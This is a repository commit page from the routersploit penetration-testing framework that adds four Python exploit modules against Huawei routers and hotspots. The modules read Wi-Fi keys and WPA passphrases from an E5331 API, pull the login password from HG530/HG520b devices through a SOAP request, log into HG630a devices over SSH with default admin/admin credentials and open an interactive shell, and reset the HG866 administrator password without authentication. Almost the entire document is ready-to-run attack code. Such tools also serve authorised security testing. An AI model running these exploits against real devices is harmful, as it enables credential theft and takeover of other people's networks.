Skip to content

R
routersploit
Commit 89477dc4 by Marcin Bury
Options

Adding multiple huawei exploits.

parent 5b917907
Showing with 327 additions and 0 deletions
routersploit/modules/exploits/huawei/e5331_mifi_info_disclosure.py 0 → 100644
import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
print_table,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Huawei E5331 Information Disclosure vulnerability.
If the target is vulnerable it allows to read sensitive information."
"""
__info__ = {
'name': 'Huawei E5331 Info Disclosure',
'description': 'Module exploits information disclosure vulnerability in Huawei E5331 MiFi Mobile Hotspot devices. If the target is vulnerable it allows to read sensitive information.',
'authors': [
'J. Greil https://www.sec-consult.com', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/32161/',
],
'devices': [
'Huawei E5331 MiFi Mobile Hotspot',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
opts = ['WifiAuthmode', 'WifiBasicencryptionmodes', 'WifiWpaencryptionmodes', 'WifiWepKey1', 'WifiWepKey2',
'WifiWepKey3', 'WifiWepKey4', 'WifiWepKeyIndex', 'WifiWpapsk', 'WifiWpsenbl', 'WifiWpscfg', 'WifiRestart']
def run(self):
url = "{}:{}/api/wlan/security-settings".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
res = []
for option in self.opts:
regexp = "<{}>(.+?)</{}>".format(option, option)
value = re.findall(regexp, response.text)
if value:
res.append((option, value[0]))
if len(res):
print_success("Found sensitive information!")
print_table(("Option", "Value"), *res)
@mute
def check(self):
url = "{}:{}/api/wlan/security-settings".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
res = []
for option in self.opts:
regexp = "<{}>(.+?)</{}>".format(option, option)
value = re.findall(regexp, response.text)
if value:
res.append(value)
if len(res):
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/huawei/hg530_hg520b_password_disclosure.py 0 → 100644
import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Huawei HG530 and HG520b Password Disclosure vulnerability.
If the target is vulnerable it allows to read credentials."
"""
__info__ = {
'name': 'Huawei HG530 & HG520b Password Disclosure',
'description': 'Module exploits password disclosure vulnerability in Huawei HG530 and HG520b devices. If the target is vulnerable it allows to read credentials.',
'authors': [
'Fady Mohamed Osman (@fady_osman)', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/37424/',
],
'devices': [
'Huawei Home Gateway HG530',
'Huawei Home Gateway HG520b',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
url = "{}:{}/UD/?5".format(self.target, self.port)
headers = {'SOAPACTION': '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"',
'Content-Type': 'text/xml; charset="utf-8"',
'Expect': '100-continue'}
data = ("<?xml version=\"1.0\"?>"
"<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
"<s:Body>"
"<m:GetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
"</m:GetLoginPassword>"
"</s:Body>"
"</s:Envelope>")
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return
r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>')
m = r.search(response.text)
if m:
print_success("Password has been found")
print_info("Password: {}".format(m.group(1)))
else:
print_error("Exploit failed - could not find password")
@mute
def check(self):
url = "{}:{}/UD/?5".format(self.target, self.port)
headers = {'SOAPACTION': '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"',
'Content-Type': 'text/xml; charset="utf-8"',
'Expect': '100-continue'}
data = ("<?xml version=\"1.0\"?>"
"<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
"<s:Body>"
"<m:GetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
"</m:GetLoginPassword>"
"</s:Body>"
"</s:Envelope>")
response = http_request(method="POST", url=url, headers=headers, data=data)
if response is None:
return False # target is not vulnerable
r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>')
m = r.search(response.text)
if m:
return True # target is vulnerable
return False # target not vulnerable
routersploit/modules/exploits/huawei/hg630a_default_creds.py 0 → 100644
import paramiko, termios, tty, sys, select, socket
from routersploit import (
exploits,
print_status,
print_error,
print_success,
mute,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Huawei HG630a and HG630a-50 devices. If the target is vulnerable it is possible to authenticate through SSH service.
"""
__info__ = {
'name': 'Huawei HG630a Default Credentials',
'description': 'Module exploits default SSH credentials Huawei HG630a and HG630a-50 devices. If the target is vulnerable it is possible to authenticate through SSH service.',
'authors': [
'Murat Sahin (@murtshn)', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/38663/',
],
'devices': [
'Huawei HG630a',
'Huawei HG630a-50',
],
}
target = exploits.Option('', 'Target IP address') # target address
user = exploits.Option('admin', 'Default username to log in with')
password = exploits.Option('admin', 'Default password to log in with')
def run(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target, 22, timeout=5, username=self.user, password=self.password)
except paramiko.ssh_exception.SSHException:
print_error("Exploit failed - cannot log in with credentials {} / {}".format(self.user, self.password))
return
else:
print_success("SSH - Successful authentication")
chan = ssh.invoke_shell()
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while(True):
r, w, e = select.select([chan, sys.stdin], [], [])
if(chan in r):
try:
x = unicode(chan.recv(1024))
if(len(x) == 0):
sys.stdout.write('\r\nExiting...\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if(sys.stdin in r):
x = sys.stdin.read(1)
if(len(x) == 0):
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
return
@mute
def check(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.target, 22, timeout=5, username=self.user, password=self.password)
except paramiko.ssh_exception.SSHException:
return False # target is not vulnerable
else:
return True # target is vulnerable
return False # target not vulnerable
routersploit/modules/exploits/huawei/hg866_password_change.py 0 → 100644
import re
from routersploit import (
exploits,
print_status,
print_error,
print_success,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Huawei HG866 Password Change vulnerability.
If the target is vulnerable it allows to change administration password.
"""
__info__ = {
'name': 'Huawei HG866 Password Cahnge',
'description': 'Module exploits password change vulnerability in Huawei HG866 devices. If the target is vulnerable it allows to change administration password.',
'authors': [
'hkm', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/19185/',
],
'devices': [
'Huawei HG866',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
password = exploits.Option('routersploit', 'Password value to change admin account with')
def run(self):
if self.check():
url = "{}:{}/html/password.html".format(self.target, self.port)
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = {'psw': self.password,
'reenterpsw': self.password,
'save': 'Apply'}
print_status("Sending password change request")
response = http_request(method="POST", url=url, headers=headers, data=data)
if response.status_code == 200:
print_success("Administrator's password has been changed to {}".format(self.password))
else:
print_error("Exploit failed - could not change password")
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute
def check(self):
url = "{}:{}/html/password.html".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and "psw" in response.text and "reenterpsw" in response.text:
return True # target is vulnerable
return False # target not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment